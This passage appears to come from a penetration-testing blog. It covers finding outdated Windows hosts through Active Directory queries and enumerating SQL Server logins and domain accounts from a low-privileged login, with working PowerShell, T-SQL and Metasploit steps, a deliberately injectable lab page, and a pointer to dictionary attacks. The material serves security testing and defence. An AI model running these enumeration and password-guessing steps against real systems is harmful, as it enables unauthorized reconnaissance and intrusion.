You can then pipe the results to other commands or simply filter for, say, Enterprise Admins.

Wrap Up

In this blog I covered some Mass Mimikatz history and shared a new script that includes a few novel options. Hopefully it's been interesting to those who haven't been exposed to the topics before. Either way, don't forget to have fun and hack responsibly.

A Faster Way to Identify High Risk Windows Assets

Scanning is a pretty common first step when trying to identify Windows systems that are missing critical patches. However, there is a faster way to start the process. Active Directory stores the operating system version and service pack level for every Windows system associated with the domain. Historically that information has been used during penetration tests to target systems missing patches like MS08-067, but it can also be used by blue teams to help streamline identification of high risk assets as part of their standard vulnerability management approach. In this blog I'll provide a high-level overview of how it can be done and point to a few scripts that can be used to help automate the process.

Introduction to Computer Accounts

When a system is added to a Windows domain, a computer account is created in Active Directory. The computer account provides the computer with access to domain resources similar to a domain user account. Periodically the computer account checks in with Active Directory to do things like rotate its password, pull down group policy updates, and sync OS version and service pack information. The OS version and service pack information are then stored in Active Directory as properties which can be queried by any domain user. This makes it a great source of information for attackers and blue teamers. There is also a hotfix property associated with each computer account in Active Directory, but from what I’ve seen it’s never populated. So at some point vulnerability scanning (or at least service fingerprinting) is required to confirm that systems suffer from critical vulnerabilities.
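To illustrate just how accessible that information is, the short ADSI sketch below pulls the operating system properties for every computer account as the current domain user; no special privileges or extra modules are required.

# Search for computer accounts as the current domain user
$Searcher = [adsisearcher]"(objectCategory=computer)"
$Searcher.PageSize = 1000

# Request the operating system related attributes
"dnshostname","operatingsystem","operatingsystemservicepack" |
    ForEach-Object { [void]$Searcher.PropertiesToLoad.Add($_) }

# Output one object per computer account
$Searcher.FindAll() | ForEach-Object {
    New-Object PSObject -Property @{
        ComputerName = [string]$_.Properties["dnshostname"]
        OS           = [string]$_.Properties["operatingsystem"]
        ServicePack  = [string]$_.Properties["operatingsystemservicepack"]
    }
}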

Vulnerability Scanner Feature Requests :)

To my knowledge, none of the major vulnerability scanners use the computer account properties from Active Directory during scanning (although I haven’t reviewed them all in detail). My hope is that sometime in the near future they’ll add some options for streamlining the identification of high risk Windows assets (and potentially asset discovery) using an approach like the one below.

  1. A vulnerability scanning profile for “High Risk Windows Systems Scan” could be selected in the vulnerability scanning software. The profile could be configured with least privileged domain credentials for authenticating to Active Directory. It could also be configured with network ranges to account for systems that are not part of the domain.
  2. A vulnerability scan could be started using the profile. The scan could connect to Active Directory via LDAP or the Active Directory Web Service (ADWS) and dump all of the enabled domain computers from Active Directory along with their OS version and Service Pack level.
  3. The results could be filtered using a profile configuration setting to only show systems that have checked in with Active Directory recently. Typically, if a system hasn’t checked in with Active Directory in a month, then it's most likely been decommissioned without having its account disabled.
  4. The results could be filtered again for OS versions and service pack levels known to be out of date or unsupported.
  5. Finally, a credentialed vulnerability scan could be conducted against the supplied network ranges and the filtered list of domain systems pulled from Active Directory to help verify that they are actually vulnerable.

They may be obvious, but I’ve listed some of the advantages of this approach below:

  • High risk assets can be identified and triaged quickly.
  • Targeting doesn't rely on potentially out-of-date asset lists.
  • The initial targeting of high risk systems does not require direct access to isolated network segments that are a pain to reach.
  • From an offensive perspective, the target enumeration usually goes undetected.

I chatted with Will Schroeder a little, and he added that it would be nice if vulnerability scanners also had an Active Directory vulnerability scanning profile to account for all of the misconfigurations that penetration testers commonly take advantage of. This could cover quite a few things including, but not limited to, insecure group policy configurations (covers a lot) and excessive privileges related to delegation, domain trusts, group inheritance, GPO inheritance, and Active Directory user/computer properties.

Automating the Process with PowerShell

Ideally it would be nice to see Active Directory data mining techniques used as part of vulnerability management programs more often. However, I think the reality is that until the functionality comes boxed with your favorite vulnerability scanner it won't be a common practice. While we all wait for that to happen, there are a few PowerShell scripts available to help automate some of the process. I spent a little time writing a PowerShell script called "Get-ExploitableSystems.psm1" that can automate some of the steps I listed in the last section. It was built on work done in two great PowerShell projects: PowerTools (by Will Schroeder and Justin Warner) and Posh-SecMod (by Carlos Perez).

PowerView (which is part of the PowerTools toolkit) has a function called "Invoke-FindVulnSystems" which looks for systems that may be missing patches like MS08-067. It's fantastic, but I wanted to ignore disabled computer accounts, and sort by last logon dates to help determine which systems are alive without having to wait for ping replies. Additionally, I built in a small list of relevant Metasploit modules and CVEs for quick reference.

I also wanted the ability to easily query information in Active Directory from a non-domain system. That's where Carlos's Posh-SecMod project comes in. I used Carlos's "Get-AuditDSComputerAccount" function as a template for authenticating to LDAP with alternative domain credentials via ADSI.
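The core of that pattern only takes a couple of lines. Below is a minimal sketch with placeholder values.

# Authenticate to a remote domain controller over LDAP with alternative credentials
$Entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://10.2.9.100","demo\administrator","MyPassword!")
$Searcher = New-Object System.DirectoryServices.DirectorySearcher($Entry,"(objectCategory=computer)")
$Searcher.FindAll() | Select-Object -First 5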

Finally, I shoved all of the results into a data table object. I've found that data tables can be really handy in PowerShell, because they allow you to dump out your dataset in a way that easily feeds into the PowerShell pipeline. For more details take a look at the code on GitHub, but be warned - it may not be the prettiest code you've ever seen. ;)
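For those who haven't used them, a data table only takes a few lines to set up, and the rows it holds feed straight into the pipeline. Here's a quick illustration with made up sample data.

# Create a data table with a couple of columns
$Table = New-Object System.Data.DataTable
[void]$Table.Columns.Add("ComputerName")
[void]$Table.Columns.Add("OperatingSystem")

# Add some sample rows
[void]$Table.Rows.Add("server1","Windows Server 2003")
[void]$Table.Rows.Add("server2","Windows Server 2012")

# The rows behave like normal objects in the pipeline
$Table | Where-Object {$_.OperatingSystem -like "*2003*"} | Format-Table -AutoSize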

Get-ExploitableSystems.psm1 Examples

The Get-ExploitableSystems.psm1 module can be downloaded here.  As I mentioned, I’ve tried to write it so that the output works in the PowerShell pipeline and can be fed into other PowerShell commands like “Test-Connection” and “Export-Csv”.  Below are a few examples of standard use cases.

1. Import the module.

Import-Module .\Get-ExploitableSystems.psm1

2. Run the function using integrated authentication.

Get-ExploitableSystems

3. Run the function against a domain controller in a different domain and make the output pretty.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demo\administrator | Format-Table -AutoSize

4. Run the function against a domain controller in a different domain and write the output to a CSV file.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demo\administrator | Export-Csv c:\temp\output.csv -NoTypeInformation

5. If you’re still interested in pinging hosts to verify they’re up you can use the command below.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demo\administrator | Test-Connection

Since Will is a super ninja PowerShell guru, he has already integrated the Get-ExploitableSystems updates into PowerTools. So I recommend just using PowerTools moving forward.

Active Directory Web Service Example

As it turns out you can do the same thing pretty easily with Active Directory Web Services (ADWS). ADWS can be accessed via the PowerShell Active Directory module cmdlets and is basically used to manage the domain. To get them set up on a Windows 7/8 workstation you should be able to follow the instructions below.

1. Download and install "Remote Server Administration Tools" for Windows 7/8: https://www.microsoft.com/en-us/download/details.aspx?id=7887

2. In PowerShell run the following commands:

Import-Module ServerManager
Add-WindowsFeature RSAT-AD-PowerShell

3. Verify that the ActiveDirectory module is available with the following command:

Get-Module -ListAvailable

4. Import the Active Directory module.

import-module ActiveDirectory

Now you should be ready for action!

As I mentioned before, one of my requirements for the script was having the ability to dump information from a domain controller on a domain that my computer is not associated with, using alternative domain credentials. Khai Tran was nice enough to show me an easy way to do this with the Active Directory PowerShell provider. Below are the basic steps. In the example below, a.b.c.d represents the target domain controller's IP address.

New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -Credential domain\user
cd RemoteADS:

Now every PowerShell AD command we run should be issued to the remote domain controller. :) I recently came across a really nice PowerShell presentation by Sean Metcalf called "Mastering PowerShell and Active Directory” that covers some useful ADWS command examples. Below is a quick code example showing how to dump active computer accounts and their OS information based on his presentation.

$tendays = (Get-Date).AddDays(-10)
Get-ADComputer -Filter {Enabled -eq $true -and LastLogonDate -gt $tendays} -Properties samaccountname,Enabled,LastLogonDate,OperatingSystem,OperatingSystemServicePack,OperatingSystemHotFix |
    Select-Object Name,Enabled,LastLogonDate,OperatingSystem,OperatingSystemServicePack,OperatingSystemHotFix |
    Format-Table -AutoSize

The script only shows enabled computer accounts that have logged in within the last 10 days. You should be able to simply change the -10 if you want to go back further. However, after some reading it sounds like "LastLogonDate" is relative to the domain controller you're querying. So to get the real last logon time you'll have to query all of the domain controllers.
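Below is a rough sketch of what that multi-domain-controller query could look like. It pulls the non-replicated lastLogon attribute from each domain controller and keeps the most recent value seen per computer, and it assumes the ActiveDirectory module is loaded and every domain controller is reachable.

# Query every domain controller and keep the newest logon time per computer
Get-ADDomainController -Filter * | ForEach-Object {
    $DC = $_.HostName
    Get-ADComputer -Filter {Enabled -eq $true} -Properties lastLogon -Server $DC |
        Select-Object Name,@{Name='LastLogon';Expression={[DateTime]::FromFileTime($_.lastLogon)}}
} |
    Group-Object Name |
    ForEach-Object { $_.Group | Sort-Object LastLogon -Descending | Select-Object -First 1 }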

Wrap Up

In this blog I took a quick look at how common Active Directory mining techniques used by the pentest community can also be used by blue teams to reduce the time it takes to identify high risk Windows systems in their environments. Hopefully, as time goes on, we'll see vulnerability scanners and SIEM solutions using them too. Whatever side you're on (red or blue) I hope the information has been useful. Have fun and hack responsibly. :)


Introduction

In SQL Server, security functions and views that allow SQL logins to enumerate domain objects should only be accessible to sysadmins. However, in this blog I’ll show how to enumerate Active Directory domain users, groups, and computers through native SQL Server functions using logins that only have the Public server role (everyone). I’ll also show how to enumerate SQL Server logins using a similar technique. To make the attacks more practical I’ve also released PowerShell and Metasploit modules to automate everything via direct connections and SQL injection.

This blog should be interesting to pentesters, developers, and DevOps looking to gain a better understanding of what the practical attacks look like. I’ve also provided a lab setup guide, but I recommend skipping it unless you’re interested in trying this out at home.

Below is a summary of the topics being covered:

  • Setting up a Lab
  • Enumerating SQL Server Logins Manually
  • Enumerating SQL Server Logins with PowerShell
  • Enumerating SQL Server Logins with Metasploit
  • Enumerating Domain Accounts

Setting up a Lab

Below I've provided some basic steps for setting up a Windows domain, SQL Server instance, and web server that can be used to replicate the scenarios covered in this blog.

Setting up the Domain and SQL Server

  1. Set up a Windows domain. Hopefully you already have a lab set up with a Windows domain/ADS. If not, you can follow the guide found below to get rolling.
    https://social.technet.microsoft.com/wiki/contents/articles/22622.building-your-first-domain-controller-on-2012-r2.aspx
  2. Add a server to the domain that can be used as the SQL Server. Below is a link to a how to guide.
    https://technet.microsoft.com/en-us/library/bb456990.aspx
  3. Download the Microsoft SQL Server Express version that includes SQL Server Management Studio and install it on the system just added to the domain. It can be downloaded from the link below.
    https://msdn.microsoft.com/en-us/evalcenter/dn434042.aspx
  4. Install SQL Server by following the wizard, but make sure to enable mixed-mode authentication and run the service as LocalSystem for the sake of the lab.
  5. Enable the TCP protocol so that the module can connect to the listener. If you're not familiar with that process you can use the guide found at the link below.
    https://blogs.msdn.com/b/sqlexpress/archive/2005/05/05/415084.aspx

Setting up the Database

1. Log into the SQL Server with the "sa" account set up during installation using the SQL Server Management Studio application.

2. Press the "New Query" button and use the TSQL below to create a database named "MyAppDb" for the lab.

-- Create database
CREATE DATABASE MyAppDb

3. Add a table with records.

-- Select the database
USE MyAppDb
-- Create table
CREATE TABLE dbo.NOCList (ID INT IDENTITY PRIMARY KEY,SpyName varchar(MAX) NOT NULL,RealName varchar(MAX) NULL)
-- Add sample records to table
INSERT dbo.NOCList (SpyName, RealName)
VALUES ('James Bond','Sean Connery')
INSERT dbo.NOCList (SpyName, RealName)
VALUES ('Ethan Hunt','Tom Cruise')
INSERT dbo.NOCList (SpyName, RealName)
VALUES ('Jason Bourne','Matt Damon')

4. Create logins for the lab.

-- Create login for the web app and direct connection
CREATE LOGIN MyPublicUser WITH PASSWORD = 'MyPassword!';
ALTER LOGIN [MyPublicUser] with default_database = [MyAppDb];
CREATE USER [MyPublicUser] FROM LOGIN [MyPublicUser];
EXEC sp_addrolemember [db_datareader], [MyPublicUser];
-- Create login that should not be viewable to MyPublicUser
CREATE LOGIN MyHiddenUser WITH PASSWORD = 'MyPassword!';

5. Verify that the login only has the CONNECT privilege. The CONNECT privilege allows accounts to authenticate to the SQL Server instance.

-- Impersonate MyPublicUser
EXECUTE AS LOGIN = 'MyPublicUser'

-- List privileges
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
GO

-- Revert back to sa
REVERT


6. Check server roles for the MyPublicUser login. You shouldn't see any roles assigned to the "MyPublicUser" login. This bit of code was grabbed from https://www.practicalsqldba.com/2012/08/sql-server-list-logins-database-and.html.

-- Impersonate MyPublicUser
EXECUTE AS LOGIN = 'MyPublicUser'

-- Check if the login is part of public
SELECT IS_SRVROLEMEMBER ( 'Public' )

-- Check other assigned server roles
SELECT PRN.name,
srvrole.name AS [role] ,
Prn.Type_Desc
FROM sys.server_role_members membership
INNER JOIN (SELECT * FROM sys.server_principals WHERE type_desc='SERVER_ROLE') srvrole
ON srvrole.Principal_id= membership.Role_principal_id
INNER JOIN sys.server_principals PRN
ON PRN.Principal_id= membership.member_principal_id WHERE Prn.Type_Desc NOT IN ('SERVER_ROLE')

REVERT

Setting up the Web Application

  1. Set up a local IIS server
  2. Make sure it's configured to process .asp pages
  3. Download testing2.asp to the web root from:
    https://raw.githubusercontent.com/nullbind/Metasploit-Modules/master/testing2.asp
  4. Modify the db_server, db_name, db_username, and db_password variables in testing2.asp as needed.
  5. Verify the page works by accessing:
    https://127.0.0.1/testing2.asp?id=1
  6. Verify the id parameter is injectable and errors are returned:
    https://127.0.0.1/testing2.asp?id=@@version

Enumerating SQL Server Logins Manually

Selecting all of the logins from the sys.syslogins view is restricted to sysadmins. However, logins with the Public role (everyone) can quickly enumerate all SQL Server logins using the “SUSER_NAME” function. The “SUSER_NAME” function takes a principal_id number and returns the associated security principal (login or server role). Luckily, principal_id numbers are assigned incrementally. The first login gets assigned 1, the second gets assigned 2, and so on. As a result, it’s possible to fuzz the principal_id to recover a full list of SQL Server logins and roles. However, it’s not immediately obvious which principals are roles and which are logins. Fortunately, the logins can be identified through error analysis of the native “sp_defaultdb” stored procedure. Once logins have been identified, they can be used in dictionary attacks that often result in additional access to the SQL Server.
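Conceptually, the whole technique boils down to a small loop. Below is a minimal PowerShell sketch using placeholder server and credential values; the PowerShell and Metasploit modules covered later do the same thing more robustly.

# Connect to the SQL Server as the least privileged login
$Connection = New-Object System.Data.SqlClient.SqlConnection
$Connection.ConnectionString = "Server=10.2.9.101;Database=master;User Id=MyPublicUser;Password=MyPassword!;"
$Connection.Open()

# Fuzz principal_id values 1 through 300 with SUSER_NAME()
1..300 | ForEach-Object {
    $Command = New-Object System.Data.SqlClient.SqlCommand("SELECT SUSER_NAME($_)",$Connection)
    $Principal = $Command.ExecuteScalar()
    if ($Principal -ne [System.DBNull]::Value) { "$_ : $Principal" }
}
$Connection.Close()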

Below is an overview of the manual process:

1. Log into SQL Server using the “MyPublicUser” login with SQL Server Management Studio.

2. To start things off, verify that it's not possible to get a list of all logins via standard queries. The queries below should only return a list of default server roles, the "sa" login, and the "MyPublicUser" login. No other logins should be returned.

SELECT name FROM sys.syslogins
SELECT name FROM sys.server_principals

3. Using the "SUSER_ID" function, it's possible to look up the principal_id for any login. The example below shows how to look up the principal_id for the "sa" login. It should be possible for any login that has the Public role (everyone).

SELECT SUSER_ID('sa')

4. To go the other way, just provide the principal_id to the "SUSER_NAME" function. Below is a short example showing how it's possible to view other logins. In this example, the "MyHiddenUser" login's principal_id is 314, but it will be different in your lab.

SELECT SUSER_NAME(1)
SELECT SUSER_NAME(2)
SELECT SUSER_NAME(3)
SELECT SUSER_NAME(314)

5. As I mentioned above, it's also possible to determine which security principals are logins and which are roles by performing error analysis on the "sp_defaultdb" stored procedure. When you're a sysadmin, "sp_defaultdb" can be used to change the default database for a login. However, when you're not a sysadmin the procedure will fail due to access restrictions. Lucky for us, valid logins return different errors than invalid logins. For example, the "sp_defaultdb" stored procedure always returns msg 15007 when an invalid login is provided, and msg 15151 when the login is valid.
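Below is a minimal sketch of that check. It assumes an open SqlConnection ($Connection) authenticated as the low privileged login, and the helper function name is made up for illustration.

# Return $true when the principal is a real login (msg 15151) and $false otherwise (msg 15007)
function Test-SqlLogin($Connection,$Principal) {
    $Command = New-Object System.Data.SqlClient.SqlCommand("EXEC sp_defaultdb '$Principal','master'",$Connection)
    try { [void]$Command.ExecuteNonQuery() }
    catch { return ($_.Exception.InnerException.Number -eq 15151) }
    return $false
}

# Example: 'sa' should come back $true, a made up name should come back $false
Test-SqlLogin $Connection 'sa'
Test-SqlLogin $Connection 'NotARealLogin'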

6. After logins have been identified it’s possible to use tools like SQLPing3, Hydra, and the mssql_login module to perform online dictionary attacks against the SQL Server. Next, let's take a look at some automation options.

Enumerating SQL Server Logins with PowerShell

The first script is written as a PowerShell module and can be used to enumerate SQL Logins via direct database connections. It can be downloaded from https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Get-SqlServer-Enum-SqlLogins.psm1.

The module can be imported with the PowerShell command below.

PS C:\temp> Import-Module .\Get-SqlServer-Enum-SqlLogins.psm1

After importing the module, the function can be run as the current Windows account or a SQL login can be supplied as shown below. My example returns many logins because my test lab is messy, but at a minimum you should see the "MyHiddenUser" login that was created at the beginning of the lab guide.

Note: By default it fuzzes 300 principal_ids, but you can increase that with the “FuzzNum” parameter.

PS C:\temp> Get-SqlServer-Enum-SqlLogins -SQLServerInstance "10.2.9.101" -SqlUser MyPublicUser -SqlPass MyPassword! -FuzzNum 1000

Enumerating SQL Server Logins with Metasploit

This module (mssql_enum_sql_logins) does the same thing as the PowerShell module, but is written for the Metasploit Framework. If you’ve updated Metasploit lately then you already have it. Below is a basic usage example.

Note: By default it fuzzes 300 principal_ids, but you can increase that with the “FuzzNum” parameter.

use auxiliary/admin/mssql/mssql_enum_sql_logins
set rhost 10.2.9.101
set rport 1433
set fuzznum 1000
set username MyPublicUser
set password MyPassword!
run

Now on to the good stuff…

Enumerating Domain Accounts

In Active Directory, every user, group, and computer has a unique identifier called an RID. Similar to the principal_id, the RID is another number that is incrementally assigned to domain objects. For a long time it's been possible to enumerate domain users, groups, and computers by fuzzing the RIDs via RPC calls using the "smb_lookupsid" module in Metasploit written by H.D. Moore. The technique I've put together here is almost exactly the same, but executed through the SQL Server function "SUSER_SNAME". As it turns out, when a full RID is supplied to the "SUSER_SNAME" function it returns the associated domain account, group, or computer name. Below I'll walk through the manual process.

Note: The "SUSER_SNAME" function can also be used to resolve SQL logins from their SIDs.

Manual Process for Enumerating Domain Accounts

1. Once again, log into SQL Server using the “MyPublicUser” login with SQL Server Management Studio.

2. To start things off, verify that it's not possible to execute stored procedures that provide information about domain groups or accounts. The queries below attempt to use the "xp_enumgroups" and "xp_logininfo" stored procedures to get domain group information from the domain associated with the SQL Server. They should fail, because they're normally only accessible to members of the sysadmin server role.

EXEC xp_enumgroups 'DEMO';
EXEC xp_logininfo 'DEMO\Domain Admins', 'members';

3. Ok, on with the show. As an attacker who knows nothing about the environment, we'll need to start by getting the domain name of the SQL Server using the query below.

SELECT DEFAULT_DOMAIN() as mydomain;

4. Next, we need to use the "SUSER_SID" function to get a sample RID from the domain of the SQL Server. You can use any default domain user or group. In the example below I've used "Domain Admins".

SELECT SUSER_SID('DEMO\Domain Admins')

5. Once a full RID has been obtained, we can extract the domain SID by grabbing the first 48 bytes. The domain SID is the unique identifier for the domain and the base of every full RID. After we have the SID we can start building our own RIDs and get fuzzing.

RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0000200
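To build candidate RIDs from there, the incremental portion is appended to the domain SID as a little-endian hex value, and the result is handed to the "SUSER_SNAME" function. Below is a rough sketch that assumes an open SqlConnection ($Connection) and the domain SID recovered above; 500 is the well-known RID of the built-in Administrator account.

# Domain SID portion recovered with SUSER_SID() above
$DomainSid = "0x0105000000000005150000009CC30DD479441EDEB31027D0"

# Append RID 500 (built-in Administrator) as little-endian hex
$RidHex = [System.BitConverter]::ToString([System.BitConverter]::GetBytes(500)).Replace("-","")
$FullRid = $DomainSid + $RidHex

# Resolve the account name for the candidate RID
$Command = New-Object System.Data.SqlClient.SqlCommand("SELECT SUSER_SNAME($FullRid)",$Connection)
$Command.ExecuteScalar()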